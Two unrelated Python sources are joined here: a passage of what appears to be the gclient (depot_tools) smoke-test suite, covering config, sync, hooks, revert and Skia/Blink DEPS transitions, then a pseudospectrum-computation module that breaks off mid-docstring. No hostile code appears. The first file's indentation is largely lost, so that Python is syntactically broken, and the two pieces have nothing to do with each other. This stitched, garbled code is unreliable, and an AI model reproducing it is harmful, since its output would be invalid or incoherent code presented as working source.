res = ('', 'Error: client not configured; see \'gclient config\'\n', 1)
self.check(res, self.gclient(['cleanup']))
self.check(res, self.gclient(['diff']))
self.check(res, self.gclient(['pack']))
self.check(res, self.gclient(['revert']))
self.check(res, self.gclient(['revinfo']))
self.check(res, self.gclient(['runhooks']))
self.check(res, self.gclient(['status']))
self.check(res, self.gclient(['sync']))
self.check(res, self.gclient(['update']))
def testConfig(self):
p = join(self.root_dir, '.gclient')
def test(cmd, expected):
if os.path.exists(p):
os.remove(p)
results = self.gclient(cmd)
self.check(('', '', 0), results)
self.checkString(expected, open(p, 'rU').read())
test(['config', self.svn_base + 'trunk/src/'],
('solutions = [\n'
' { "name" : "src",\n'
' "url" : "%strunk/src",\n'
' "deps_file" : "DEPS",\n'
' "managed" : True,\n'
' "custom_deps" : {\n'
' },\n'
' "safesync_url": "",\n'
' },\n'
']\n'
'cache_dir = None\n') % self.svn_base)
test(['config', self.git_base + 'repo_1', '--name', 'src'],
('solutions = [\n'
' { "name" : "src",\n'
' "url" : "%srepo_1",\n'
' "deps_file" : "DEPS",\n'
' "managed" : True,\n'
' "custom_deps" : {\n'
' },\n'
' "safesync_url": "",\n'
' },\n'
']\n'
'cache_dir = None\n') % self.git_base)
test(['config', 'foo', 'faa'],
'solutions = [\n'
' { "name" : "foo",\n'
' "url" : "foo",\n'
' "deps_file" : "DEPS",\n'
' "managed" : True,\n'
' "custom_deps" : {\n'
' },\n'
' "safesync_url": "faa",\n'
' },\n'
']\n'
'cache_dir = None\n')
test(['config', 'foo', '--deps', 'blah'],
'solutions = [\n'
' { "name" : "foo",\n'
' "url" : "foo",\n'
' "deps_file" : "blah",\n'
' "managed" : True,\n'
' "custom_deps" : {\n'
' },\n'
' "safesync_url": "",\n'
' },\n'
']\n'
'cache_dir = None\n')
test(['config', '--spec', '["blah blah"]'], '["blah blah"]')
os.remove(p)
results = self.gclient(['config', 'foo', 'faa', 'fuu'])
err = ('Usage: gclient.py config [options] [url] [safesync url]\n\n'
'gclient.py: error: Inconsistent arguments. Use either --spec or one'
' or 2 args\n')
self.check(('', err, 2), results)
self.assertFalse(os.path.exists(join(self.root_dir, '.gclient')))
def testSolutionNone(self):
results = self.gclient(['config', '--spec',
'solutions=[{"name": "./", "url": None}]'])
self.check(('', '', 0), results)
results = self.gclient(['sync'])
self.check(('', '', 0), results)
self.assertTree({})
results = self.gclient(['revinfo'])
self.check(('./: None\n', '', 0), results)
self.check(('', '', 0), self.gclient(['cleanup']))
self.check(('', '', 0), self.gclient(['diff']))
self.assertTree({})
self.check(('', '', 0), self.gclient(['pack']))
self.check(('', '', 0), self.gclient(['revert']))
self.assertTree({})
self.check(('', '', 0), self.gclient(['runhooks']))
self.assertTree({})
self.check(('', '', 0), self.gclient(['status']))
def testDifferentTopLevelDirectory(self):
    # Check that the .gclient file is used even if it does not mention the
    # directory src itself, as long as src is pulled in via dependencies.
self.gclient(['config', self.svn_base + 'trunk/src.DEPS'])
deps = join(self.root_dir, 'src.DEPS')
os.mkdir(deps)
write(join(deps, 'DEPS'),
'deps = { "src": "%strunk/src" }' % (self.svn_base))
src = join(self.root_dir, 'src')
os.mkdir(src)
res = self.gclient(['status', '--jobs', '1'], src)
self.checkBlock(res[0], [('running', deps), ('running', src)])
class GClientSmokeGIT(GClientSmokeBase):
def setUp(self):
super(GClientSmokeGIT, self).setUp()
self.enabled = self.FAKE_REPOS.set_up_git()
def testSync(self):
if not self.enabled:
return
# TODO(maruel): safesync.
self.gclient(['config', self.git_base + 'repo_1', '--name', 'src'])
# Test unversioned checkout.
self.parseGclient(
['sync', '--deps', 'mac', '--jobs', '1'],
['running', 'running'])
# TODO(maruel): http://crosbug.com/3582 hooks run even if not matching, must
# add sync parsing to get the list of updated files.
tree = self.mangle_git_tree(('repo_1@2', 'src'),
('repo_2@1', 'src/repo2'),
('repo_3@2', 'src/repo2/repo_renamed'))
tree['src/git_hooked1'] = 'git_hooked1'
tree['src/git_hooked2'] = 'git_hooked2'
self.assertTree(tree)
# Manually remove git_hooked1 before synching to make sure it's not
# recreated.
os.remove(join(self.root_dir, 'src', 'git_hooked1'))
# Test incremental versioned sync: sync backward.
self.parseGclient(
['sync', '--jobs', '1', '--revision',
'src@' + self.githash('repo_1', 1),
'--deps', 'mac', '--delete_unversioned_trees'],
['deleting'])
tree = self.mangle_git_tree(('repo_1@1', 'src'),
('repo_2@2', 'src/repo2'),
('repo_3@1', 'src/repo2/repo3'),
('repo_4@2', 'src/repo4'))
tree['src/git_hooked2'] = 'git_hooked2'
self.assertTree(tree)
    # Test incremental sync: --delete_unversioned_trees is not passed this time.
self.parseGclient(
['sync', '--deps', 'mac', '--jobs', '1'],
['running', 'running'])
tree = self.mangle_git_tree(('repo_1@2', 'src'),
('repo_2@1', 'src/repo2'),
('repo_3@1', 'src/repo2/repo3'),
('repo_3@2', 'src/repo2/repo_renamed'),
('repo_4@2', 'src/repo4'))
tree['src/git_hooked1'] = 'git_hooked1'
tree['src/git_hooked2'] = 'git_hooked2'
self.assertTree(tree)
def testSyncIgnoredSolutionName(self):
"""TODO(maruel): This will become an error soon."""
if not self.enabled:
return
self.gclient(['config', self.git_base + 'repo_1', '--name', 'src'])
self.parseGclient(
['sync', '--deps', 'mac', '--jobs', '1',
'--revision', 'invalid@' + self.githash('repo_1', 1)],
['running', 'running'],
'Please fix your script, having invalid --revision flags '
'will soon considered an error.\n')
tree = self.mangle_git_tree(('repo_1@2', 'src'),
('repo_2@1', 'src/repo2'),
('repo_3@2', 'src/repo2/repo_renamed'))
tree['src/git_hooked1'] = 'git_hooked1'
tree['src/git_hooked2'] = 'git_hooked2'
self.assertTree(tree)
def testSyncNoSolutionName(self):
if not self.enabled:
return
# When no solution name is provided, gclient uses the first solution listed.
self.gclient(['config', self.git_base + 'repo_1', '--name', 'src'])
self.parseGclient(
['sync', '--deps', 'mac', '--jobs', '1',
'--revision', self.githash('repo_1', 1)],
[])
tree = self.mangle_git_tree(('repo_1@1', 'src'),
('repo_2@2', 'src/repo2'),
('repo_3@1', 'src/repo2/repo3'),
('repo_4@2', 'src/repo4'))
self.assertTree(tree)
def testSyncJobs(self):
if not self.enabled:
return
# TODO(maruel): safesync.
self.gclient(['config', self.git_base + 'repo_1', '--name', 'src'])
# Test unversioned checkout.
self.parseGclient(
['sync', '--deps', 'mac', '--jobs', '8'],
['running', 'running'],
untangle=True)
# TODO(maruel): http://crosbug.com/3582 hooks run even if not matching, must
# add sync parsing to get the list of updated files.
tree = self.mangle_git_tree(('repo_1@2', 'src'),
('repo_2@1', 'src/repo2'),
('repo_3@2', 'src/repo2/repo_renamed'))
tree['src/git_hooked1'] = 'git_hooked1'
tree['src/git_hooked2'] = 'git_hooked2'
self.assertTree(tree)
# Manually remove git_hooked1 before synching to make sure it's not
# recreated.
os.remove(join(self.root_dir, 'src', 'git_hooked1'))
# Test incremental versioned sync: sync backward.
# Use --jobs 1 otherwise the order is not deterministic.
self.parseGclient(
['sync', '--revision', 'src@' + self.githash('repo_1', 1),
'--deps', 'mac', '--delete_unversioned_trees', '--jobs', '1'],
['deleting'],
untangle=True)
tree = self.mangle_git_tree(('repo_1@1', 'src'),
('repo_2@2', 'src/repo2'),
('repo_3@1', 'src/repo2/repo3'),
('repo_4@2', 'src/repo4'))
tree['src/git_hooked2'] = 'git_hooked2'
self.assertTree(tree)
    # Test incremental sync: --delete_unversioned_trees is not passed this time.
self.parseGclient(
['sync', '--deps', 'mac', '--jobs', '8'],
['running', 'running'],
untangle=True)
tree = self.mangle_git_tree(('repo_1@2', 'src'),
('repo_2@1', 'src/repo2'),
('repo_3@1', 'src/repo2/repo3'),
('repo_3@2', 'src/repo2/repo_renamed'),
('repo_4@2', 'src/repo4'))
tree['src/git_hooked1'] = 'git_hooked1'
tree['src/git_hooked2'] = 'git_hooked2'
self.assertTree(tree)
def testRunHooks(self):
if not self.enabled:
return
self.gclient(['config', self.git_base + 'repo_1', '--name', 'src'])
self.gclient(['sync', '--deps', 'mac'])
tree = self.mangle_git_tree(('repo_1@2', 'src'),
('repo_2@1', 'src/repo2'),
('repo_3@2', 'src/repo2/repo_renamed'))
tree['src/git_hooked1'] = 'git_hooked1'
tree['src/git_hooked2'] = 'git_hooked2'
self.assertTree(tree)
os.remove(join(self.root_dir, 'src', 'git_hooked1'))
os.remove(join(self.root_dir, 'src', 'git_hooked2'))
# runhooks runs all hooks even if not matching by design.
out = self.parseGclient(['runhooks', '--deps', 'mac'],
['running', 'running'])
self.assertEquals(1, len(out[0]))
self.assertEquals(1, len(out[1]))
tree = self.mangle_git_tree(('repo_1@2', 'src'),
('repo_2@1', 'src/repo2'),
('repo_3@2', 'src/repo2/repo_renamed'))
tree['src/git_hooked1'] = 'git_hooked1'
tree['src/git_hooked2'] = 'git_hooked2'
self.assertTree(tree)
def testPreDepsHooks(self):
if not self.enabled:
return
self.gclient(['config', self.git_base + 'repo_5', '--name', 'src'])
expectation = [
('running', self.root_dir), # pre-deps hook
]
out = self.parseGclient(['sync', '--deps', 'mac', '--jobs=1',
'--revision', 'src@' + self.githash('repo_5', 2)],
expectation)
self.assertEquals(2, len(out[0]))
self.assertEquals('pre-deps hook', out[0][1])
tree = self.mangle_git_tree(('repo_5@2', 'src'),
('repo_1@2', 'src/repo1'),
('repo_2@1', 'src/repo2')
)
tree['src/git_pre_deps_hooked'] = 'git_pre_deps_hooked'
self.assertTree(tree)
os.remove(join(self.root_dir, 'src', 'git_pre_deps_hooked'))
# Pre-DEPS hooks don't run with runhooks.
self.gclient(['runhooks', '--deps', 'mac'])
tree = self.mangle_git_tree(('repo_5@2', 'src'),
('repo_1@2', 'src/repo1'),
('repo_2@1', 'src/repo2')
)
self.assertTree(tree)
# Pre-DEPS hooks run when syncing with --nohooks.
self.gclient(['sync', '--deps', 'mac', '--nohooks',
'--revision', 'src@' + self.githash('repo_5', 2)])
tree = self.mangle_git_tree(('repo_5@2', 'src'),
('repo_1@2', 'src/repo1'),
('repo_2@1', 'src/repo2')
)
tree['src/git_pre_deps_hooked'] = 'git_pre_deps_hooked'
self.assertTree(tree)
os.remove(join(self.root_dir, 'src', 'git_pre_deps_hooked'))
# Pre-DEPS hooks don't run with --noprehooks
self.gclient(['sync', '--deps', 'mac', '--noprehooks',
'--revision', 'src@' + self.githash('repo_5', 2)])
tree = self.mangle_git_tree(('repo_5@2', 'src'),
('repo_1@2', 'src/repo1'),
('repo_2@1', 'src/repo2')
)
self.assertTree(tree)
def testPreDepsHooksError(self):
if not self.enabled:
return
self.gclient(['config', self.git_base + 'repo_5', '--name', 'src'])
    expected_stdout = [
('running', self.root_dir), # pre-deps hook
('running', self.root_dir), # pre-deps hook (fails)
]
expected_stderr = ("Error: Command '/usr/bin/python -c import sys; "
"sys.exit(1)' returned non-zero exit status 1 in %s\n"
% self.root_dir)
stdout, stderr, retcode = self.gclient(['sync', '--deps', 'mac', '--jobs=1',
'--revision',
'src@' + self.githash('repo_5', 3)])
self.assertEquals(stderr, expected_stderr)
self.assertEquals(2, retcode)
    self.checkBlock(stdout, expected_stdout)
def testRevInfo(self):
if not self.enabled:
return
self.gclient(['config', self.git_base + 'repo_1', '--name', 'src'])
self.gclient(['sync', '--deps', 'mac'])
results = self.gclient(['revinfo', '--deps', 'mac'])
out = ('src: %(base)srepo_1\n'
'src/repo2: %(base)srepo_2@%(hash2)s\n'
'src/repo2/repo_renamed: %(base)srepo_3\n' %
{
'base': self.git_base,
'hash2': self.githash('repo_2', 1)[:7],
})
self.check((out, '', 0), results)
results = self.gclient(['revinfo', '--deps', 'mac', '--actual'])
out = ('src: %(base)srepo_1@%(hash1)s\n'
'src/repo2: %(base)srepo_2@%(hash2)s\n'
'src/repo2/repo_renamed: %(base)srepo_3@%(hash3)s\n' %
{
'base': self.git_base,
'hash1': self.githash('repo_1', 2),
'hash2': self.githash('repo_2', 1),
'hash3': self.githash('repo_3', 2),
})
self.check((out, '', 0), results)
class GClientSmokeGITMutates(GClientSmokeBase):
"""testRevertAndStatus mutates the git repo so move it to its own suite."""
def setUp(self):
super(GClientSmokeGITMutates, self).setUp()
self.enabled = self.FAKE_REPOS.set_up_git()
def testRevertAndStatus(self):
if not self.enabled:
return
# Commit new change to repo to make repo_2's hash use a custom_var.
cur_deps = self.FAKE_REPOS.git_hashes['repo_1'][-1][1]['DEPS']
repo_2_hash = self.FAKE_REPOS.git_hashes['repo_2'][1][0][:7]
new_deps = cur_deps.replace('repo_2@%s\'' % repo_2_hash,
'repo_2@\' + Var(\'r2hash\')')
new_deps = 'vars = {\'r2hash\': \'%s\'}\n%s' % (repo_2_hash, new_deps)
self.FAKE_REPOS._commit_git('repo_1', { # pylint: disable=W0212
'DEPS': new_deps,
'origin': 'git/repo_1@3\n',
})
config_template = (
"""solutions = [{
"name" : "src",
"url" : "%(git_base)srepo_1",
"deps_file" : "DEPS",
"managed" : True,
"custom_vars" : %(custom_vars)s,
}]""")
self.gclient(['config', '--spec', config_template % {
'git_base': self.git_base,
'custom_vars': {}
}])
# Tested in testSync.
self.gclient(['sync', '--deps', 'mac'])
write(join(self.root_dir, 'src', 'repo2', 'hi'), 'Hey!')
out = self.parseGclient(['status', '--deps', 'mac', '--jobs', '1'], [])
# TODO(maruel): http://crosbug.com/3584 It should output the unversioned
# files.
self.assertEquals(0, len(out))
# Revert implies --force implies running hooks without looking at pattern
# matching. For each expected path, 'git reset' and 'git clean' are run, so
# there should be two results for each. The last two results should reflect
# writing git_hooked1 and git_hooked2. There's only one result for the third
# because it is clean and has no output for 'git clean'.
out = self.parseGclient(['revert', '--deps', 'mac', '--jobs', '1'],
['running', 'running'])
self.assertEquals(2, len(out))
tree = self.mangle_git_tree(('repo_1@3', 'src'),
('repo_2@1', 'src/repo2'),
('repo_3@2', 'src/repo2/repo_renamed'))
tree['src/git_hooked1'] = 'git_hooked1'
tree['src/git_hooked2'] = 'git_hooked2'
self.assertTree(tree)
# Make a new commit object in the origin repo, to force reset to fetch.
self.FAKE_REPOS._commit_git('repo_2', { # pylint: disable=W0212
'origin': 'git/repo_2@3\n',
})
self.gclient(['config', '--spec', config_template % {
'git_base': self.git_base,
'custom_vars': {'r2hash': self.FAKE_REPOS.git_hashes['repo_2'][-1][0] }
}])
out = self.parseGclient(['revert', '--deps', 'mac', '--jobs', '1'],
['running', 'running'])
self.assertEquals(2, len(out))
tree = self.mangle_git_tree(('repo_1@3', 'src'),
('repo_2@3', 'src/repo2'),
('repo_3@2', 'src/repo2/repo_renamed'))
tree['src/git_hooked1'] = 'git_hooked1'
tree['src/git_hooked2'] = 'git_hooked2'
self.assertTree(tree)
results = self.gclient(['status', '--deps', 'mac', '--jobs', '1'])
out = results[0].splitlines(False)
# TODO(maruel): http://crosbug.com/3584 It should output the unversioned
# files.
self.assertEquals(0, len(out))
def testSyncNoHistory(self):
if not self.enabled:
return
# Create an extra commit in repo_2 and point DEPS to its hash.
cur_deps = self.FAKE_REPOS.git_hashes['repo_1'][-1][1]['DEPS']
repo_2_hash_old = self.FAKE_REPOS.git_hashes['repo_2'][1][0][:7]
self.FAKE_REPOS._commit_git('repo_2', { # pylint: disable=W0212
'last_file': 'file created in last commit',
})
repo_2_hash_new = self.FAKE_REPOS.git_hashes['repo_2'][-1][0]
new_deps = cur_deps.replace(repo_2_hash_old, repo_2_hash_new)
self.assertNotEqual(new_deps, cur_deps)
self.FAKE_REPOS._commit_git('repo_1', { # pylint: disable=W0212
'DEPS': new_deps,
'origin': 'git/repo_1@4\n',
})
config_template = (
"""solutions = [{
"name" : "src",
"url" : "%(git_base)srepo_1",
"deps_file" : "DEPS",
"managed" : True,
}]""")
self.gclient(['config', '--spec', config_template % {
'git_base': self.git_base
}])
self.gclient(['sync', '--no-history', '--deps', 'mac'])
repo2_root = join(self.root_dir, 'src', 'repo2')
# Check that repo_2 is actually shallow and its log has only one entry.
rev_lists = subprocess2.check_output(['git', 'rev-list', 'HEAD'],
cwd=repo2_root)
self.assertEquals(repo_2_hash_new, rev_lists.strip('\r\n'))
# Check that we have actually checked out the right commit.
self.assertTrue(os.path.exists(join(repo2_root, 'last_file')))
class SkiaDEPSTransitionSmokeTest(GClientSmokeBase):
"""Simulate the behavior of bisect bots as they transition across the Skia
DEPS change."""
FAKE_REPOS_CLASS = fake_repos.FakeRepoSkiaDEPS
def setUp(self):
super(SkiaDEPSTransitionSmokeTest, self).setUp()
self.enabled = self.FAKE_REPOS.set_up_git()
def testSkiaDEPSChangeGit(self):
if not self.enabled:
return
# Create an initial checkout:
# - Single checkout at the root.
# - Multiple checkouts in a shared subdirectory.
self.gclient(['config', '--spec',
'solutions=['
'{"name": "src",'
' "url": "' + self.git_base + 'repo_2",'
'}]'])
checkout_path = os.path.join(self.root_dir, 'src')
skia = os.path.join(checkout_path, 'third_party', 'skia')
skia_gyp = os.path.join(skia, 'gyp')
skia_include = os.path.join(skia, 'include')
skia_src = os.path.join(skia, 'src')
gyp_git_url = self.git_base + 'repo_3'
include_git_url = self.git_base + 'repo_4'
src_git_url = self.git_base + 'repo_5'
skia_git_url = self.FAKE_REPOS.git_base + 'repo_1'
pre_hash = self.githash('repo_2', 1)
post_hash = self.githash('repo_2', 2)
# Initial sync. Verify that we get the expected checkout.
res = self.gclient(['sync', '--deps', 'mac', '--revision',
'src@%s' % pre_hash])
self.assertEqual(res[2], 0, 'Initial sync failed.')
self.assertEqual(gclient_scm.GIT.Capture(['config', 'remote.origin.url'],
skia_gyp), gyp_git_url)
self.assertEqual(gclient_scm.GIT.Capture(['config', 'remote.origin.url'],
skia_include), include_git_url)
self.assertEqual(gclient_scm.GIT.Capture(['config', 'remote.origin.url'],
skia_src), src_git_url)
# Verify that the sync succeeds. Verify that we have the expected merged
# checkout.
res = self.gclient(['sync', '--deps', 'mac', '--revision',
'src@%s' % post_hash])
self.assertEqual(res[2], 0, 'DEPS change sync failed.')
self.assertEqual(gclient_scm.GIT.Capture(['config', 'remote.origin.url'],
skia), skia_git_url)
# Sync again. Verify that we still have the expected merged checkout.
res = self.gclient(['sync', '--deps', 'mac', '--revision',
'src@%s' % post_hash])
self.assertEqual(res[2], 0, 'Subsequent sync failed.')
self.assertEqual(gclient_scm.GIT.Capture(['config', 'remote.origin.url'],
skia), skia_git_url)
# Sync back to the original DEPS. Verify that we get the original structure.
res = self.gclient(['sync', '--deps', 'mac', '--revision',
'src@%s' % pre_hash])
self.assertEqual(res[2], 0, 'Reverse sync failed.')
self.assertEqual(gclient_scm.GIT.Capture(['config', 'remote.origin.url'],
skia_gyp), gyp_git_url)
self.assertEqual(gclient_scm.GIT.Capture(['config', 'remote.origin.url'],
skia_include), include_git_url)
self.assertEqual(gclient_scm.GIT.Capture(['config', 'remote.origin.url'],
skia_src), src_git_url)
# Sync again. Verify that we still have the original structure.
res = self.gclient(['sync', '--deps', 'mac', '--revision',
'src@%s' % pre_hash])
self.assertEqual(res[2], 0, 'Subsequent sync #2 failed.')
self.assertEqual(gclient_scm.GIT.Capture(['config', 'remote.origin.url'],
skia_gyp), gyp_git_url)
self.assertEqual(gclient_scm.GIT.Capture(['config', 'remote.origin.url'],
skia_include), include_git_url)
self.assertEqual(gclient_scm.GIT.Capture(['config', 'remote.origin.url'],
skia_src), src_git_url)
class BlinkDEPSTransitionSmokeTest(GClientSmokeBase):
"""Simulate the behavior of bisect bots as they transition across the Blink
DEPS change."""
FAKE_REPOS_CLASS = fake_repos.FakeRepoBlinkDEPS
def setUp(self):
super(BlinkDEPSTransitionSmokeTest, self).setUp()
self.enabled = self.FAKE_REPOS.set_up_git()
self.checkout_path = os.path.join(self.root_dir, 'src')
self.blink = os.path.join(self.checkout_path, 'third_party', 'WebKit')
self.blink_git_url = self.FAKE_REPOS.git_base + 'repo_2'
self.pre_merge_sha = self.githash('repo_1', 1)
self.post_merge_sha = self.githash('repo_1', 2)
def CheckStatusPreMergePoint(self):
self.assertEqual(gclient_scm.GIT.Capture(['config', 'remote.origin.url'],
self.blink), self.blink_git_url)
self.assertTrue(os.path.exists(join(self.blink, '.git')))
self.assertTrue(os.path.exists(join(self.blink, 'OWNERS')))
with open(join(self.blink, 'OWNERS')) as f:
owners_content = f.read()
self.assertEqual('OWNERS-pre', owners_content, 'OWNERS not updated')
self.assertTrue(os.path.exists(join(self.blink, 'Source', 'exists_always')))
self.assertTrue(os.path.exists(
join(self.blink, 'Source', 'exists_before_but_not_after')))
self.assertFalse(os.path.exists(
join(self.blink, 'Source', 'exists_after_but_not_before')))
def CheckStatusPostMergePoint(self):
    # Check that the contents still exist
self.assertTrue(os.path.exists(join(self.blink, 'OWNERS')))
with open(join(self.blink, 'OWNERS')) as f:
owners_content = f.read()
self.assertEqual('OWNERS-post', owners_content, 'OWNERS not updated')
self.assertTrue(os.path.exists(join(self.blink, 'Source', 'exists_always')))
    # Check that files removed between the branch points are actually deleted.
self.assertTrue(os.path.exists(
join(self.blink, 'Source', 'exists_after_but_not_before')))
self.assertFalse(os.path.exists(
join(self.blink, 'Source', 'exists_before_but_not_after')))
# But not the .git folder
self.assertFalse(os.path.exists(join(self.blink, '.git')))
@unittest.skip('flaky')
def testBlinkDEPSChangeUsingGclient(self):
"""Checks that {src,blink} repos are consistent when syncing going back and
forth using gclient sync src@revision."""
if not self.enabled:
return
self.gclient(['config', '--spec',
'solutions=['
'{"name": "src",'
' "url": "' + self.git_base + 'repo_1",'
'}]'])
# Go back and forth two times.
for _ in xrange(2):
res = self.gclient(['sync', '--jobs', '1',
'--revision', 'src@%s' % self.pre_merge_sha])
self.assertEqual(res[2], 0, 'DEPS change sync failed.')
self.CheckStatusPreMergePoint()
res = self.gclient(['sync', '--jobs', '1',
'--revision', 'src@%s' % self.post_merge_sha])
self.assertEqual(res[2], 0, 'DEPS change sync failed.')
self.CheckStatusPostMergePoint()
@unittest.skip('flaky')
def testBlinkDEPSChangeUsingGit(self):
"""Like testBlinkDEPSChangeUsingGclient, but move the main project using
directly git and not gclient sync."""
if not self.enabled:
return
self.gclient(['config', '--spec',
'solutions=['
'{"name": "src",'
' "url": "' + self.git_base + 'repo_1",'
' "managed": False,'
'}]'])
# Perform an initial sync to bootstrap the repo.
res = self.gclient(['sync', '--jobs', '1'])
self.assertEqual(res[2], 0, 'Initial gclient sync failed.')
# Go back and forth two times.
for _ in xrange(2):
subprocess2.check_call(['git', 'checkout', '-q', self.pre_merge_sha],
cwd=self.checkout_path)
res = self.gclient(['sync', '--jobs', '1'])
self.assertEqual(res[2], 0, 'gclient sync failed.')
self.CheckStatusPreMergePoint()
subprocess2.check_call(['git', 'checkout', '-q', self.post_merge_sha],
cwd=self.checkout_path)
res = self.gclient(['sync', '--jobs', '1'])
self.assertEqual(res[2], 0, 'DEPS change sync failed.')
self.CheckStatusPostMergePoint()
@unittest.skip('flaky')
def testBlinkLocalBranchesArePreserved(self):
"""Checks that the state of local git branches are effectively preserved
when going back and forth."""
if not self.enabled:
return
self.gclient(['config', '--spec',
'solutions=['
'{"name": "src",'
' "url": "' + self.git_base + 'repo_1",'
'}]'])
# Initialize to pre-merge point.
self.gclient(['sync', '--revision', 'src@%s' % self.pre_merge_sha])
self.CheckStatusPreMergePoint()
# Create a branch named "foo".
subprocess2.check_call(['git', 'checkout', '-qB', 'foo'],
cwd=self.blink)
# Cross the pre-merge point.
self.gclient(['sync', '--revision', 'src@%s' % self.post_merge_sha])
self.CheckStatusPostMergePoint()
# Go backwards and check that we still have the foo branch.
self.gclient(['sync', '--revision', 'src@%s' % self.pre_merge_sha])
self.CheckStatusPreMergePoint()
subprocess2.check_call(
['git', 'show-ref', '-q', '--verify', 'refs/heads/foo'], cwd=self.blink)
if __name__ == '__main__':
if '-v' in sys.argv:
logging.basicConfig(level=logging.DEBUG)
if '-c' in sys.argv:
COVERAGE = True
sys.argv.remove('-c')
if os.path.exists('.coverage'):
os.remove('.coverage')
os.environ['COVERAGE_FILE'] = os.path.join(
os.path.dirname(os.path.dirname(os.path.abspath(__file__))),
'.coverage')
unittest.main()
|
|
'''
Parallel computation of the pseudospectrum of a square matrix directly from its definition.
Author: Dmitry E. Kislov
E-mail: kislov@easydan.com
Date: 25 Nov. 2015
'''
from __future__ import print_function
import multiprocessing
import warnings
import numpy as np
import itertools
__all__ = ['gersgorin_bounds', 'pseudo', 'eigen_bounds']
def gersgorin_bounds(A):
    r'''Localize the eigenvalues of a matrix in the complex plane.

    The function uses the well known S.A. Gershgorin (1931) theorem on
    eigenvalue localization: all eigenvalues lie in the closed region of
    the complex plane formed by the union of the disks

    .. math::
        |z - a_{kk}| \leq R_k - |a_{kk}|, \quad R_k = \sum\limits_{i=1}^n |a_{ki}|

    :param A: the input matrix as a ``numpy.array`` or 2D list with ``A.shape == (n, m)``.
        For rectangular matrices the bounding box is computed for the largest
        square submatrix of shape min(n, m) x min(n, m).
    :returns: a list [min Re, max Re, min Im, max Im] bounding all Gershgorin disks.
    '''
n, m = np.shape(A)
if n <= m:
B = A[:n, :n]
else:
B = A[:m, :m]
n = m
_A = np.abs(B)
Rk = np.sum(_A, axis=1)
radii = [Rk[k] - _A[k, k] for k in range(n)]
rbounds = [B[k, k].real - radii[k] for k in range(n)]
rbounds.extend([B[k, k].real + radii[k] for k in range(n)])
cbounds = [B[k, k].imag - radii[k] for k in range(n)]
cbounds.extend([B[k, k].imag + radii[k] for k in range(n)])
return [np.min(rbounds), np.max(rbounds), np.min(cbounds), np.max(cbounds)]
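# A minimal usage sketch for gersgorin_bounds (illustrative only; the matrix
# below is made up). The returned box encloses every eigenvalue of A:
#
#   >>> import numpy as np
#   >>> A = np.array([[2.0, -1.0], [0.5, 3.0]])
#   >>> lbr, ubr, lbc, ubc = gersgorin_bounds(A)
#   >>> w = np.linalg.eigvals(A)
#   >>> assert np.all((w.real >= lbr) & (w.real <= ubr))
#   >>> assert np.all((w.imag >= lbc) & (w.imag <= ubc))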
def eigen_bounds(A, percent=0.1):
    '''Build a pseudospectra bounding box around the matrix eigenvalues.

    :param A: the input matrix as a ``numpy.array`` or 2D list with ``A.shape == (n, m)``.
        For rectangular matrices the bounding box is computed for the largest
        square submatrix of shape min(n, m) x min(n, m).
    :param percent: a relative margin for the bounding box (default is 0.1).
        Bound values are computed as the extreme eigenvalues +/- percent*residual,
        where residual is the maximal distance between all possible
        pairs of eigenvalues.
    '''
n, m = np.shape(A)
if n <= m:
B = A[:n, :n]
else:
B = A[:m, :m]
eigvals = np.linalg.eigvals(B)
reals = np.real(eigvals)
imags = np.imag(eigvals)
lbr = np.min(reals)
ubr = np.max(reals)
lbc = np.min(imags)
ubc = np.max(imags)
residual = np.max([abs(x-y) for x, y in itertools.combinations(eigvals, 2)])
return [lbr-percent*residual,
ubr+percent*residual,
lbc-percent*residual,
ubc+percent*residual]
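# eigen_bounds usage follows the same pattern (again with a made-up matrix):
# with percent=0.1 the box hugs the spectrum with a margin of 10% of the
# eigenvalue spread, which is usually much tighter than the Gershgorin box:
#
#   >>> import numpy as np
#   >>> eigen_bounds(np.array([[2.0, -1.0], [0.5, 3.0]]), percent=0.1)
#   # -> approximately [2.4, 2.6, -0.6, 0.6] for eigenvalues 2.5 +/- 0.5i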
def _safe_bbox(bbox, A):
    '''Convert a bbox sequence to a list of four floats [min Re, max Re, min Im, max Im].

    Falls back to the Gershgorin bounds of A if the values cannot be converted.
    '''
    assert len(bbox) >= 4, "Length of bbox should be greater than or equal to 4."
try:
res = [float(bbox[i]) for i in range(4)]
except (TypeError, ValueError):
warnings.warn('Invalid bbox-array. Gershgorin circles will be used.',
RuntimeWarning)
res = gersgorin_bounds(A)
return res
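# _calc_pseudo evaluates, for every grid point (x, y), the smallest singular
# value of (x + i*y)*I - A; these values (normalized by ||A|| in pseudo())
# are exactly the quantities whose level sets form the pseudospectra.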
def _calc_pseudo(A, x, y, n, m):
def ff(x, y): return np.linalg.svd((x+(1j)*y)*np.eye(n, m) - A,
compute_uv=False)[-1]
return [ff(_x, _y) for _x, _y in zip(x, y)]
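# _pseudo_worker unpacks a single task tuple (index, digits, A, x-chunk,
# y-chunk, n, m). When digits > 15 it tries to compute the smallest singular
# value with mpmath at the requested precision (falling back to numpy if
# mpmath is missing); the chunk index is returned with the result so that
# pseudo() can stitch the chunks back together in order.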
def _pseudo_worker(*args):
digits = args[0][1]
result = None
if digits > 15:
try:
import mpmath as mp
mp.mp.dps = int(digits)
def ff(x, y): return np.float128(mp.svd(mp.matrix((x+(1j) * y) * np.eye(args[0][-2], args[0][-1]) - args[0][2]), compute_uv=False).tolist()[-1][0])
result = (args[0][0],
[ff(x, y) for x, y in zip(args[0][3], args[0][4])])
except ImportError:
warnings.warn('Cannot import mpmath module.\
Precision of computations will be reduced to default value (15 digits).',
RuntimeWarning)
if not result:
result = (args[0][0], _calc_pseudo(*args[0][2:]))
return result
def pseudo(A, bbox=gersgorin_bounds, ppd=100, ncpu=1, digits=15):
    '''Calculate the pseudospectrum of a matrix A via the classical grid method.
.. note::
        It is assumed that the :math:`\\varepsilon`-pseudospectrum of a matrix is defined by :math:`\\sigma_{\\min}(A-\\lambda I)\\leq\\varepsilon\\|A\\|`.
:param A: the input matrix as a ``numpy.array`` or 2D list with ``A.shape==(n,m)``.
:param bbox: the pseudospectra bounding box, a list of size 4 [MIN RE, MAX RE, MIN IM, MAX IM] or a function.
(default value: gersgorin_bounds - a function computes bounding box via Gershgorin circle theorem)
:param ppd: points per dimension, default is 100, i.e. total grid size is 100x100 = 10000.
    :param ncpu: the number of CPUs used for the calculation, default is 1. If it is greater than the number of available cores, it will be reduced to ncores-1.
    :param digits: the number of digits used for the minimal singular value computation. When digits > 15, the mpmath package is assumed to be installed.
    If it is not, default (double) precision will be used for all calculations. If mpmath is available, the minimal singular value of :math:`(A-\\lambda I)` will
